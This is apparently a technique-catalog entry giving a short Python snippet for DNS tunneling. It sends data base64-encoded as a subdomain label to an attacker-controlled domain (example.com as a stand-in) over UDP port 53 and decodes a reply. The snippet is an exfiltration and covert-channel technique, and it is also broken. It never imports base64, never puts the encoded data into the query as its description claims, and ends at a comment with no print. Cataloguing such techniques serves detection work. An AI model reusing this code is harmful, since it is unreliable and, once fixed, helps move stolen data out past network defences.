(Python) DNS Tunneling by Thomas Roccia (fr0gger)

Created the Tuesday 13 December 2022. Updated 2 months, 3 weeks ago.


This code uses the dnslib and socket modules to encode the specified data as a base64 string and send it as a DNS query to the specified DNS server. The DNS query uses the domain name and subdomain that the attacker controls, with the encoded data as the subdomain label. The code then receives a DNS response from the server, decodes the data payload, and prints it.


            import dnslib
import socket

# Replace with the IP address of the DNS server
dns_server = ""

# Replace with the domain name and subdomain that you control
domain_name = "example.com"
subdomain = "tunnel"

# Replace with the data that you want to transfer
data = b"hello"

# Encode the data as a base64 string
encoded_data = base64.b64encode(data)

# Create a DNS query with the encoded data as the subdomain label
query = dnslib.DNSRecord.question(subdomain + "." + domain_name)

# Send the DNS query to the DNS server
dns_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
dns_socket.sendto(query.pack(), (dns_server, 53))

# Receive the DNS response from the DNS server
response = dnslib.DNSRecord.parse(dns_socket.recv(4096))

# Decode the DNS response and extract the data payload
decoded_data = base64.b64decode(response.rr[0].rdata.label)

# Print the decoded data